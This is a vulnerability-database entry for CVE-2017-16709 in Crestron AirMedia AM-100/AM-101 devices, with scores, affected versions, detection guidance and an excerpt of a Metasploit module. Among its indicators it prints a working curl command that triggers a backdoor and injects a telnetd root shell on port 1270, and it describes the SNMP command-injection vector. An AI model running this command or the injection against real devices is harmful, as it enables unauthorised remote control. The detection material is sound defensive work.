CVE-2017-16709
published 2018-07-11CVE-2017-16709: Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote authenticated administrators to execute…
PriorityP269high7.2CVSS 3.0
AVNACLPRHUINSUCHIHAH
EXPLOIT
EPSS
71.96%
99.4th percentile
Crestron Airmedia AM-100 devices with firmware before 1.6.0 and AM-101 devices with firmware before 2.7.0 allows remote authenticated administrators to execute arbitrary code via unspecified vectors.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crestron | airmedia_am-100_firmware | < 1.6.0 | 1.6.0 |
| crestron | airmedia_am-101_firmware | < 2.7.0 | 2.7.0 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "command=SetFlaghttphttp://192.168.88.253:1270||telnetd -l /bin/sh -b 0.0.0.0:1270|| whoamilol" --insecure https://192.168.88.250/cgi-bin/return.cgi↗
- →Detect unauthenticated POST requests to /cgi-bin/return.cgi containing the string 'SetFlag' in the body, which is the backdoor trigger condition. ↗
- →Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.1.0 for values beginning with 'ftp://' followed by shell command injection patterns (e.g., '$(' or '||'). ↗
- →Monitor SNMP SET operations targeting OID 1.3.6.1.4.1.3212.100.3.2.9.5.0 with Integer value 1, which triggers the firmware upgrade/command execution. ↗
- →Alert on outbound telnet connections from Crestron AM-100/AM-101 devices, especially on non-standard ports such as 1270, which indicates a spawned backdoor shell. ↗
- →Check SNMP sysDescr (OID 1.3.6.1.2.1.1.1.0) for 'Crestron Electronics AM-100' or 'Crestron Electronics AM-101' to identify vulnerable devices on the network. ↗
- →The exploit payload is padded to exactly 255 bytes in the SNMP OctetString for camFWUpgradeFTPURL; anomalous 255-byte SNMP SET values on this OID are a strong indicator of exploitation. ↗
- →The Metasploit module uses 'linux/armle/meterpreter_reverse_tcp' as the default payload; detect ARMLE Meterpreter reverse TCP connections originating from Crestron AM-100/AM-101 devices. ↗
- ·A valid SNMP read-write community string is required to exploit the SNMP injection vector; the module defaults to 'private'. Changing or restricting SNMP community strings limits exploitability. ↗
- ·The backdoor in return.cgi was silently removed in AM-100 firmware 1.6.0.2 with no public documentation; devices on earlier firmware remain vulnerable to unauthenticated exploitation. ↗
- ·AM-100 and AM-101 are considered EOL with no fix available for the SNMP injection; the Metasploit check module marks them unconditionally vulnerable regardless of firmware version. ↗
CVSS provenance
nvdv3.07.2HIGHCVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
AwindInc SNMP Service - Command Injection (Metasploit)
exploitdb·2019-09-05
CVE-2017-16709 AwindInc SNMP Service - Command Injection (Metasploit)
AwindInc SNMP Service - Command Injection (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "AwindInc SNMP Service Command Injection",
'Description' => %q{
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
A valid SNMP read-write community is required to exploit this vulnerability.
The following devices are known to be affected by this issue:
* Crestron Airmedia AM-100 MSF_LICENSE,
'Author' =>
[
'Quentin Kaiser '
],
'References' =>
[
['CVE', '2017-16709'],
['URL', 'https://github.com/QKaiser/awind-research'],
['URL', 'https://qkaiser.github.io/pen
Metasploit
AwindInc SNMP Service Command Injection
metasploit
AwindInc SNMP Service Command Injection
AwindInc SNMP Service Command Injection
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community is required to exploit this vulnerability. The following devices are known to be affected by this issue: * Crestron Airmedia AM-100 <= version 1.5.0.4 * Crestron Airmedia AM-101 <= version 2.5.0.12 * Awind WiPG-1600w <= version 2.0.1.8 * Awind WiPG-2000d <= version 2.1.6.2 * Barco wePresent 2000 <= version 2.1.5.7 * Newline Trucast 2 <= version 2.1.0.5 * Newline Trucast 3 <= version 2.1.3.7
http://packetstormsecurity.com/files/154362/AwindInc-SNMP-Service-Command-Injection.htmlhttps://support.crestron.com/app/answers/answer_view/a_id/5471/~/the-latest-details-from-crestron-on-security-and-safety-on-the-internet#CVE-2017-16709https://www.tenable.com/security/research/tra-2019-20http://packetstormsecurity.com/files/154362/AwindInc-SNMP-Service-Command-Injection.htmlhttps://support.crestron.com/app/answers/answer_view/a_id/5471/~/the-latest-details-from-crestron-on-security-and-safety-on-the-internet#CVE-2017-16709https://www.tenable.com/security/research/tra-2019-20
2018-07-11
Published